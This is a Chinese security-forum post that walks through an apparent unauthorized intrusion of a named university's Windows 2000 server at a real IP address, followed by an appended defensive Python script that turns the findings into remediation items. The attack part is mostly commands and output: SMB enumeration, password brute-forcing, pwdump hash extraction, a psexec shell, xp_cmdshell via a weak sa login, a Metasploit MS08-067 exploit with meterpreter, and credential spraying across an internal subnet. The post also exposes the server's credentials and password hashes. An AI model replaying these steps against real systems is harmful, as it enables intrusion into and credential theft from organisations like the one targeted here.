中国网络渗透测试联盟

Title: nmap+msf intrusion of Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46
Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to scan for the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan results

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241    // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the ms08-067 hole and overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
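Added example, not part of the post and not nmap's or Metasploit's code: a small Python triage script for the defending side. It parses host-script output in the layout shown above (smb-enum-shares, smb-brute, smb-check-vulns) together with pwdump-style hash lines, and turns each weakness the walkthrough leaned on (anonymous IPC$ access, blank or guessable passwords, an unpatched MS08-067, LM hashes still stored) into a remediation item. The sample input is constructed, not taken from any host; the registry settings RestrictAnonymous and NoLMHash and the MS08-067 update KB958644 are real Windows items, while the function names and finding labels are this example's own.

```python
import re

# Constructed sample in the layout of nmap's "Host script results" as shown
# in the post; values are illustrative and not taken from a real host.
SAMPLE_NMAP = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# Constructed pwdump-style export (user:rid => LM:NT); the hashes are placeholders.
SAMPLE_PWDUMP = """\
Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
test:1002 => 0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
"""

SCRIPT_HEADER = re.compile(r"^\|_?\s*([a-z0-9-]+):\s*$")   # e.g. "| smb-brute:"
LOGIN_OK = re.compile(r"^(\S+?):(\S+) => Login was successful")
VULN = re.compile(r"^(\S+):\s*VULNERABLE")
PWDUMP_LINE = re.compile(r"^(\S+):(\d+) => ([^:]+):(.+)$")
LSA_KEY = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"
PATCHES = {"MS08-067": "KB958644"}   # bulletin -> update, fact known to the editor


def parse_host_scripts(text):
    """Group the '|'-prefixed body lines of each NSE script under the script's name."""
    scripts, current = {}, None
    for raw in text.splitlines():
        m = SCRIPT_HEADER.match(raw)
        if m:
            current = m.group(1)
            scripts[current] = []
        elif current and raw.startswith("|"):
            scripts[current].append(raw.lstrip("|_").strip())
    return scripts


def audit_nmap(text):
    """Return (check, subject, remediation) tuples for the host-script output."""
    findings = []
    scripts = parse_host_scripts(text)

    share = None   # smb-enum-shares prints the share name, then its access line
    for line in scripts.get("smb-enum-shares", []):
        m = re.match(r"Anonymous access:\s*(\S+)", line)
        if m is None:
            share = line
        elif m.group(1) != "<none>":
            findings.append(("anonymous-share-access", f"{share}: {m.group(1)}",
                             f"set RestrictAnonymous under {LSA_KEY}; block TCP 139/445 at the perimeter"))

    for line in scripts.get("smb-brute", []):
        m = LOGIN_OK.match(line)
        if m:
            user, secret = m.groups()
            check = "blank-password" if secret == "<blank>" else "guessable-password"
            findings.append((check, user, "set a strong password and enable account lockout"))

    for line in scripts.get("smb-check-vulns", []):
        m = VULN.match(line)
        if m:
            bulletin = m.group(1)
            findings.append(("missing-patch", bulletin,
                             f"apply the vendor update ({PATCHES.get(bulletin, 'see bulletin')})"))
    return findings


def audit_pwdump(text):
    """Flag blank passwords and accounts that still have an LM hash stored."""
    findings = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if not m:
            continue
        user, _rid, lm_hash, nt_hash = m.groups()
        if nt_hash.startswith("NO PASSWORD"):
            findings.append(("blank-password", user, "set a password; disable the account if unused"))
        if not lm_hash.startswith("NO PASSWORD"):
            findings.append(("lm-hash-stored", user,
                             f"enable NoLMHash under {LSA_KEY} and reset the password so only the NT hash remains"))
    return findings


if __name__ == "__main__":
    for check, subject, fix in audit_nmap(SAMPLE_NMAP) + audit_pwdump(SAMPLE_PWDUMP):
        print(f"{check:24} {subject:20} -> {fix}")
```

Run it on a saved nmap report and a hash export to get a short remediation list; every item above corresponds to one step the walkthrough needed, so clearing the list also removes the path it followed.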
& X# i1 G9 x$ q, ^- j! s0 F
8 O* j* S, E4 j, ?6 N5 V




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2